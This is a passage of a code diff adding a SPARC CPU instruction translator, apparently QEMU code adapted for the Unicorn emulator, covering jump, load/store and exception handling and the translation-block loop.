(xop == 0x37) { /* V8 CPop2, V9 impdep2 */ +#ifdef TARGET_SPARC64 + goto illegal_insn; +#else + goto ncp_insn; +#endif +#ifdef TARGET_SPARC64 + } else if (xop == 0x39) { /* V9 return */ + TCGv_i32 r_const; + + save_state(dc); + cpu_src1 = get_src1(dc, insn); + cpu_tmp0 = get_temp_tl(dc); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_src1, simm); + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2) { + cpu_src2 = gen_load_gpr(dc, rs2); + tcg_gen_add_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + } else { + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, cpu_src1); + } + } + gen_helper_restore(tcg_ctx, tcg_ctx->cpu_env); + gen_mov_pc_npc(dc); + r_const = tcg_const_i32(tcg_ctx, 3); + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, cpu_tmp0); + dc->npc = DYNAMIC_PC; + goto jmp_insn; +#endif + } else { + cpu_src1 = get_src1(dc, insn); + cpu_tmp0 = get_temp_tl(dc); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_src1, simm); + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2) { + cpu_src2 = gen_load_gpr(dc, rs2); + tcg_gen_add_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + } else { + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, cpu_src1); + } + } + switch (xop) { + case 0x38: /* jmpl */ + { + TCGv t; + TCGv_i32 r_const; + + t = gen_dest_gpr(dc, rd); + tcg_gen_movi_tl(tcg_ctx, t, dc->pc); + gen_store_gpr(dc, rd, t); + gen_mov_pc_npc(dc); + r_const = tcg_const_i32(tcg_ctx, 3); + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + gen_address_mask(dc, cpu_tmp0); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, cpu_tmp0); + dc->npc = DYNAMIC_PC; + } + goto jmp_insn; +#if !defined(CONFIG_USER_ONLY) && !defined(TARGET_SPARC64) + case 0x39: /* rett, V9 return */ + { + TCGv_i32 
r_const; + + if (!supervisor(dc)) + goto priv_insn; + gen_mov_pc_npc(dc); + r_const = tcg_const_i32(tcg_ctx, 3); + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, cpu_tmp0); + dc->npc = DYNAMIC_PC; + gen_helper_rett(tcg_ctx, tcg_ctx->cpu_env); + } + goto jmp_insn; +#endif + case 0x3b: /* flush */ + if (!((dc)->def->features & CPU_FEATURE_FLUSH)) + goto unimp_flush; + /* nop */ + break; + case 0x3c: /* save */ + save_state(dc); + gen_helper_save(tcg_ctx, tcg_ctx->cpu_env); + gen_store_gpr(dc, rd, cpu_tmp0); + break; + case 0x3d: /* restore */ + save_state(dc); + gen_helper_restore(tcg_ctx, tcg_ctx->cpu_env); + gen_store_gpr(dc, rd, cpu_tmp0); + break; +#if !defined(CONFIG_USER_ONLY) && defined(TARGET_SPARC64) + case 0x3e: /* V9 done/retry */ + { + switch (rd) { + case 0: + if (!supervisor(dc)) + goto priv_insn; + dc->npc = DYNAMIC_PC; + dc->pc = DYNAMIC_PC; + gen_helper_done(tcg_ctx, tcg_ctx->cpu_env); + goto jmp_insn; + case 1: + if (!supervisor(dc)) + goto priv_insn; + dc->npc = DYNAMIC_PC; + dc->pc = DYNAMIC_PC; + gen_helper_retry(tcg_ctx, tcg_ctx->cpu_env); + goto jmp_insn; + default: + goto illegal_insn; + } + } + break; +#endif + default: + goto illegal_insn; + } + } + break; + } + break; + case 3: /* load/store instructions */ + { + unsigned int xop = GET_FIELD(insn, 7, 12); + /* ??? gen_address_mask prevents us from using a source + register directly. Always generate a temporary. 
*/ + TCGv cpu_addr = get_temp_tl(dc); + + tcg_gen_mov_tl(tcg_ctx, cpu_addr, get_src1(dc, insn)); + if (xop == 0x3c || xop == 0x3e) { + /* V9 casa/casxa : no offset */ + } else if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + if (simm != 0) { + tcg_gen_addi_tl(tcg_ctx, cpu_addr, cpu_addr, simm); + } + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2 != 0) { + tcg_gen_add_tl(tcg_ctx, cpu_addr, cpu_addr, gen_load_gpr(dc, rs2)); + } + } + if (xop < 4 || (xop > 7 && xop < 0x14 && xop != 0x0e) || + (xop > 0x17 && xop <= 0x1d ) || + (xop > 0x2c && xop <= 0x33) || xop == 0x1f || xop == 0x3d) { + TCGv cpu_val = gen_dest_gpr(dc, rd); + + switch (xop) { + case 0x0: /* ld, V9 lduw, load unsigned word */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld32u(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x1: /* ldub, load unsigned byte */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld8u(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x2: /* lduh, load unsigned halfword */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld16u(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x3: /* ldd, load double word */ + if (rd & 1) + goto illegal_insn; + else { + TCGv_i32 r_const; + TCGv_i64 t64; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, 7); + /* XXX remove alignment check */ + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + gen_address_mask(dc, cpu_addr); + t64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ld64(dc->uc, t64, cpu_addr, dc->mem_idx); + tcg_gen_trunc_i64_tl(tcg_ctx, cpu_val, t64); + tcg_gen_ext32u_tl(tcg_ctx, cpu_val, cpu_val); + gen_store_gpr(dc, rd + 1, cpu_val); + tcg_gen_shri_i64(tcg_ctx, t64, t64, 32); + tcg_gen_trunc_i64_tl(tcg_ctx, cpu_val, t64); + tcg_temp_free_i64(tcg_ctx, t64); + tcg_gen_ext32u_tl(tcg_ctx, cpu_val, cpu_val); + } + break; + case 0x9: /* ldsb, load signed byte */ + gen_address_mask(dc, cpu_addr); + 
tcg_gen_qemu_ld8s(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0xa: /* ldsh, load signed halfword */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld16s(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0xd: /* ldstub -- XXX: should be atomically */ + { + TCGv r_const; + + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld8s(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + r_const = tcg_const_tl(tcg_ctx, 0xff); + tcg_gen_qemu_st8(dc->uc, r_const, cpu_addr, dc->mem_idx); + tcg_temp_free(tcg_ctx, r_const); + } + break; + case 0x0f: + /* swap, swap register with memory. Also atomically */ + { + TCGv t0 = get_temp_tl(dc); + CHECK_IU_FEATURE(dc, SWAP); + cpu_src1 = gen_load_gpr(dc, rd); + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld32u(dc->uc, t0, cpu_addr, dc->mem_idx); + tcg_gen_qemu_st32(dc->uc, cpu_src1, cpu_addr, dc->mem_idx); + tcg_gen_mov_tl(tcg_ctx, cpu_val, t0); + } + break; +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) + case 0x10: /* lda, V9 lduwa, load word alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 4, 0); + break; + case 0x11: /* lduba, load unsigned byte alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 1, 0); + break; + case 0x12: /* lduha, load unsigned halfword alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 2, 0); + break; + case 0x13: /* ldda, load double word alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + if (rd & 1) + goto illegal_insn; + save_state(dc); + gen_ldda_asi(dc, cpu_val, cpu_addr, insn, rd); + goto skip_move; + case 0x19: /* ldsba, load 
signed byte alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 1, 1); + break; + case 0x1a: /* ldsha, load signed halfword alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 2, 1); + break; + case 0x1d: /* ldstuba -- XXX: should be atomically */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_ldstub_asi(dc, cpu_val, cpu_addr, insn); + break; + case 0x1f: /* swapa, swap reg with alt. memory. Also + atomically */ + CHECK_IU_FEATURE(dc, SWAP); +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + cpu_src1 = gen_load_gpr(dc, rd); + gen_swap_asi(dc, cpu_val, cpu_src1, cpu_addr, insn); + break; + +#ifndef TARGET_SPARC64 + case 0x30: /* ldc */ + case 0x31: /* ldcsr */ + case 0x33: /* lddc */ + goto ncp_insn; +#endif +#endif +#ifdef TARGET_SPARC64 + case 0x08: /* V9 ldsw */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld32s(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x0b: /* V9 ldx */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_ld64(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x18: /* V9 ldswa */ + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 4, 1); + break; + case 0x1b: /* V9 ldxa */ + save_state(dc); + gen_ld_asi(dc, cpu_val, cpu_addr, insn, 8, 0); + break; + case 0x2d: /* V9 prefetch, no effect */ + goto skip_move; + case 0x30: /* V9 ldfa */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + gen_ldf_asi(dc, cpu_addr, insn, 4, rd); + gen_update_fprs_dirty(dc, rd); + goto skip_move; + case 0x33: /* V9 lddfa */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + 
gen_ldf_asi(dc, cpu_addr, insn, 8, DFPREG(rd)); + gen_update_fprs_dirty(dc, DFPREG(rd)); + goto skip_move; + case 0x3d: /* V9 prefetcha, no effect */ + goto skip_move; + case 0x32: /* V9 ldqfa */ + CHECK_FPU_FEATURE(dc, FLOAT128); + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + gen_ldf_asi(dc, cpu_addr, insn, 16, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); + goto skip_move; +#endif + default: + goto illegal_insn; + } + gen_store_gpr(dc, rd, cpu_val); +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) + skip_move: ; +#endif + } else if (xop >= 0x20 && xop < 0x24) { + TCGv t0; + + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + switch (xop) { + case 0x20: /* ldf, load fpreg */ + gen_address_mask(dc, cpu_addr); + t0 = get_temp_tl(dc); + tcg_gen_qemu_ld32u(dc->uc, t0, cpu_addr, dc->mem_idx); + cpu_dst_32 = gen_dest_fpr_F(dc); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_dst_32, t0); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x21: /* ldfsr, V9 ldxfsr */ +#ifdef TARGET_SPARC64 + gen_address_mask(dc, cpu_addr); + if (rd == 1) { + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ld64(dc->uc, t64, cpu_addr, dc->mem_idx); + gen_helper_ldxfsr(tcg_ctx, tcg_ctx->cpu_env, t64); + tcg_temp_free_i64(tcg_ctx, t64); + break; + } +#endif + cpu_dst_32 = get_temp_i32(dc); + t0 = get_temp_tl(dc); + tcg_gen_qemu_ld32u(dc->uc, t0, cpu_addr, dc->mem_idx); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_dst_32, t0); + gen_helper_ldfsr(tcg_ctx, tcg_ctx->cpu_env, cpu_dst_32); + break; + case 0x22: /* ldqf, load quad fpreg */ + { + TCGv_i32 r_const; + + CHECK_FPU_FEATURE(dc, FLOAT128); + r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); + gen_address_mask(dc, cpu_addr); + gen_helper_ldqf(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + gen_op_store_QT0_fpr(dc, QFPREG(rd)); + gen_update_fprs_dirty(dc, QFPREG(rd)); + } + break; + case 0x23: /* lddf, load double fpreg */ + gen_address_mask(dc, 
cpu_addr); + cpu_dst_64 = gen_dest_fpr_D(dc, rd); + tcg_gen_qemu_ld64(dc->uc, cpu_dst_64, cpu_addr, dc->mem_idx); + gen_store_fpr_D(dc, rd, cpu_dst_64); + break; + default: + goto illegal_insn; + } + } else if (xop < 8 || (xop >= 0x14 && xop < 0x18) || + xop == 0xe || xop == 0x1e) { + TCGv cpu_val = gen_load_gpr(dc, rd); + + switch (xop) { + case 0x4: /* st, store word */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_st32(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x5: /* stb, store byte */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_st8(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x6: /* sth, store halfword */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_st16(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x7: /* std, store double word */ + if (rd & 1) + goto illegal_insn; + else { + TCGv_i32 r_const; + TCGv_i64 t64; + TCGv lo; + + save_state(dc); + gen_address_mask(dc, cpu_addr); + r_const = tcg_const_i32(tcg_ctx, 7); + /* XXX remove alignment check */ + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + lo = gen_load_gpr(dc, rd + 1); + + t64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, cpu_val); + tcg_gen_qemu_st64(dc->uc, t64, cpu_addr, dc->mem_idx); + tcg_temp_free_i64(tcg_ctx, t64); + } + break; +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) + case 0x14: /* sta, V9 stwa, store word alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_st_asi(dc, cpu_val, cpu_addr, insn, 4); + dc->npc = DYNAMIC_PC; + break; + case 0x15: /* stba, store byte alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_st_asi(dc, cpu_val, cpu_addr, insn, 1); + dc->npc = DYNAMIC_PC; + break; + case 0x16: /* stha, store halfword alternate */ +#ifndef TARGET_SPARC64 
+ if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_st_asi(dc, cpu_val, cpu_addr, insn, 2); + dc->npc = DYNAMIC_PC; + break; + case 0x17: /* stda, store double word alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + if (rd & 1) + goto illegal_insn; + else { + save_state(dc); + gen_stda_asi(dc, cpu_val, cpu_addr, insn, rd); + } + break; +#endif +#ifdef TARGET_SPARC64 + case 0x0e: /* V9 stx */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_st64(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x1e: /* V9 stxa */ + save_state(dc); + gen_st_asi(dc, cpu_val, cpu_addr, insn, 8); + dc->npc = DYNAMIC_PC; + break; +#endif + default: + goto illegal_insn; + } + } else if (xop > 0x23 && xop < 0x28) { + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + switch (xop) { + case 0x24: /* stf, store fpreg */ + { + TCGv t = get_temp_tl(dc); + gen_address_mask(dc, cpu_addr); + cpu_src1_32 = gen_load_fpr_F(dc, rd); + tcg_gen_ext_i32_tl(tcg_ctx, t, cpu_src1_32); + tcg_gen_qemu_st32(dc->uc, t, cpu_addr, dc->mem_idx); + } + break; + case 0x25: /* stfsr, V9 stxfsr */ + { + TCGv t = get_temp_tl(dc); + + tcg_gen_ld_tl(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUSPARCState, fsr)); +#ifdef TARGET_SPARC64 + gen_address_mask(dc, cpu_addr); + if (rd == 1) { + tcg_gen_qemu_st64(dc->uc, t, cpu_addr, dc->mem_idx); + break; + } +#endif + tcg_gen_qemu_st32(dc->uc, t, cpu_addr, dc->mem_idx); + } + break; + case 0x26: +#ifdef TARGET_SPARC64 + /* V9 stqf, store quad fpreg */ + { + TCGv_i32 r_const; + + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_op_load_fpr_QT0(dc, QFPREG(rd)); + r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); + gen_address_mask(dc, cpu_addr); + gen_helper_stqf(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + } + break; +#else /* !TARGET_SPARC64 */ + /* stdfq, store floating point queue */ +#if 
defined(CONFIG_USER_ONLY) + goto illegal_insn; +#else + if (!supervisor(dc)) + goto priv_insn; + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + goto nfq_insn; +#endif +#endif + case 0x27: /* stdf, store double fpreg */ + gen_address_mask(dc, cpu_addr); + cpu_src1_64 = gen_load_fpr_D(dc, rd); + tcg_gen_qemu_st64(dc->uc, cpu_src1_64, cpu_addr, dc->mem_idx); + break; + default: + goto illegal_insn; + } + } else if (xop > 0x33 && xop < 0x3f) { + save_state(dc); + switch (xop) { +#ifdef TARGET_SPARC64 + case 0x34: /* V9 stfa */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_stf_asi(dc, cpu_addr, insn, 4, rd); + break; + case 0x36: /* V9 stqfa */ + { + TCGv_i32 r_const; + + CHECK_FPU_FEATURE(dc, FLOAT128); + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + r_const = tcg_const_i32(tcg_ctx, 7); + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + gen_stf_asi(dc, cpu_addr, insn, 16, QFPREG(rd)); + } + break; + case 0x37: /* V9 stdfa */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_stf_asi(dc, cpu_addr, insn, 8, DFPREG(rd)); + break; + case 0x3e: /* V9 casxa */ + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_casx_asi(dc, cpu_addr, cpu_src2, insn, rd); + break; +#else + case 0x34: /* stc */ + case 0x35: /* stcsr */ + case 0x36: /* stdcq */ + case 0x37: /* stdc */ + goto ncp_insn; +#endif +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) + case 0x3c: /* V9 or LEON3 casa */ +#ifndef TARGET_SPARC64 + CHECK_IU_FEATURE(dc, CASA); + if (IS_IMM) { + goto illegal_insn; + } + if (!supervisor(dc)) { + goto priv_insn; + } +#endif + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_cas_asi(dc, cpu_addr, cpu_src2, insn, rd); + break; +#endif + default: + goto illegal_insn; + } + } else { + goto illegal_insn; + } + } + break; + } + /* default case for non jump instructions */ + if (dc->npc == DYNAMIC_PC) { + dc->pc = DYNAMIC_PC; + 
gen_op_next_insn(dc); + } else if (dc->npc == JUMP_PC) { + /* we can do a static jump */ + gen_branch2(dc, dc->jump_pc[0], dc->jump_pc[1], *(TCGv *)tcg_ctx->cpu_cond); + dc->is_br = 1; + } else { + dc->pc = dc->npc; + dc->npc = dc->npc + 4; + } + jmp_insn: + goto egress; + illegal_insn: + { + TCGv_i32 r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_ILL_INSN); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + dc->is_br = 1; + } + goto egress; + unimp_flush: + { + TCGv_i32 r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_UNIMP_FLUSH); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + dc->is_br = 1; + } + goto egress; +#if !defined(CONFIG_USER_ONLY) + priv_insn: + { + TCGv_i32 r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_PRIV_INSN); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + dc->is_br = 1; + } + goto egress; +#endif + nfpu_insn: + save_state(dc); + gen_op_fpexception_im(dc, FSR_FTT_UNIMPFPOP); + dc->is_br = 1; + goto egress; +#if !defined(CONFIG_USER_ONLY) && !defined(TARGET_SPARC64) + nfq_insn: + save_state(dc); + gen_op_fpexception_im(dc, FSR_FTT_SEQ_ERROR); + dc->is_br = 1; + goto egress; +#endif +#ifndef TARGET_SPARC64 + ncp_insn: + { + TCGv r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_NCP_INSN); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free(tcg_ctx, r_const); + dc->is_br = 1; + } + goto egress; +#endif + egress: + if (dc->n_t32 != 0) { + int i; + for (i = dc->n_t32 - 1; i >= 0; --i) { + tcg_temp_free_i32(tcg_ctx, dc->t32[i]); + } + dc->n_t32 = 0; + } + if (dc->n_ttl != 0) { + int i; + for (i = dc->n_ttl - 1; i >= 0; --i) { + tcg_temp_free(tcg_ctx, dc->ttl[i]); + } + dc->n_ttl = 0; + } +} + +static inline void gen_intermediate_code_internal(SPARCCPU *cpu, + TranslationBlock 
*tb, + bool spc) +{ + CPUState *cs = CPU(cpu); + CPUSPARCState *env = &cpu->env; + target_ulong pc_start, last_pc; + uint16_t *gen_opc_end; + DisasContext dc1, *dc = &dc1; + CPUBreakpoint *bp; + int j, lj = -1; + int num_insns = 0; + int max_insns; + unsigned int insn; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + bool block_full = false; + + memset(dc, 0, sizeof(DisasContext)); + dc->uc = env->uc; + dc->tb = tb; + pc_start = tb->pc; + dc->pc = pc_start; + last_pc = dc->pc; + dc->npc = (target_ulong) tb->cs_base; + dc->cc_op = CC_OP_DYNAMIC; + dc->mem_idx = cpu_mmu_index(env); + dc->def = env->def; + dc->fpu_enabled = tb_fpu_enabled(tb->flags); + dc->address_mask_32bit = tb_am_enabled(tb->flags); + dc->singlestep = (cs->singlestep_enabled); // || singlestep); + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + + + // early check to see if the address of this block is the until address + if (pc_start == env->uc->addr_end) { + gen_tb_start(tcg_ctx); + gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); + goto done_generating; + } + + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) + max_insns = CF_COUNT_MASK; + + // Unicorn: early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + gen_tb_start(tcg_ctx); + save_state(dc); + gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); + goto done_generating; + } + + // Unicorn: trace this block on request + // Only hook this block if it is not broken from previous translation due to + // full translation cache + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + // save block address to see if we need to patch block size later + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } + + gen_tb_start(tcg_ctx); + do { + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, 
&cs->breakpoints, entry) { + if (bp->pc == dc->pc) { + if (dc->pc != pc_start) + save_state(dc); + gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); + tcg_gen_exit_tb(tcg_ctx, 0); + dc->is_br = 1; + goto exit_gen_loop; + } + } + } + if (spc) { + qemu_log("Search PC...\n"); + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + tcg_ctx->gen_opc_pc[lj] = dc->pc; + tcg_ctx->gen_opc_npc[lj] = dc->npc; + tcg_ctx->gen_opc_instr_start[lj] = 1; + tcg_ctx->gen_opc_icount[lj] = num_insns; + } + } + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) + // gen_io_start(); + // Unicorn: end address tells us to stop emulation + if (dc->pc == dc->uc->addr_end) { + save_state(dc); + gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); + break; + } else { + last_pc = dc->pc; + insn = cpu_ldl_code(env, dc->pc); + } + + disas_sparc_insn(dc, insn, true); + num_insns++; + + if (dc->is_br) + break; + /* if the next PC is different, we abort now */ + if (dc->pc != (last_pc + 4)) + break; + + /* if we reach a page boundary, we stop generation so that the + PC of a TT_TFAULT exception is always in the right page */ + if ((dc->pc & (TARGET_PAGE_SIZE - 1)) == 0) + break; + /* if single step mode, we generate only one instruction and + generate an exception */ + if (dc->singlestep) { + break; + } + } while ((tcg_ctx->gen_opc_ptr < gen_opc_end) && + (dc->pc - pc_start) < (TARGET_PAGE_SIZE - 32) && + num_insns < max_insns); + + /* if too long translation, save this info */ + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns) + block_full = true; + + exit_gen_loop: + //if (tb->cflags & CF_LAST_IO) { + // gen_io_end(); + //} + if (!dc->is_br) { + if (dc->pc != DYNAMIC_PC && + (dc->npc != DYNAMIC_PC && dc->npc != JUMP_PC)) { + /* static PC and NPC: we can use direct chaining */ + gen_goto_tb(dc, 0, dc->pc, dc->npc); + } else { + if (dc->pc != DYNAMIC_PC) { + tcg_gen_movi_tl(tcg_ctx, *(TCGv 
*)tcg_ctx->sparc_cpu_pc, dc->pc); + } + save_npc(dc); + tcg_gen_exit_tb(tcg_ctx, 0); + } + } + +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + if (spc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; +#if 0 + log_page_dump(); +#endif + tcg_ctx->gen_opc_jump_pc[0] = dc->jump_pc[0]; + tcg_ctx->gen_opc_jump_pc[1] = dc->jump_pc[1]; + } else { + tb->size = last_pc + 4 - pc_start; + tb->icount = num_insns; + } + + env->uc->block_full = block_full; +} + +void gen_intermediate_code(CPUSPARCState * env, TranslationBlock * tb) +{ + gen_intermediate_code_internal(sparc_env_get_cpu(env), tb, false); +} + +void gen_intermediate_code_pc(CPUSPARCState * env, TranslationBlock * tb) +{ + gen_intermediate_code_internal(sparc_env_get_cpu(env), tb, true); +} + +void gen_intermediate_code_init(CPUSPARCState *env) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + struct uc_struct *uc = env->uc; + unsigned int i; + static const char * const gregnames[8] = { + NULL, // g0 not used + "g1", + "g2", + "g3", + "g4", + "g5", + "g6", + "g7", + }; + static const char * const fregnames[32] = { + "f0", "f2", "f4", "f6", "f8", "f10", "f12", "f14", + "f16", "f18", "f20", "f22", "f24", "f26", "f28", "f30", + "f32", "f34", "f36", "f38", "f40", "f42", "f44", "f46", + "f48", "f50", "f52", "f54", "f56", "f58", "f60", "f62", + }; + + /* init various static tables */ + tcg_ctx->cpu_env = tcg_global_reg_new_ptr(tcg_ctx, TCG_AREG0, "env"); + tcg_ctx->cpu_regwptr = tcg_global_mem_new_ptr(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, regwptr), + 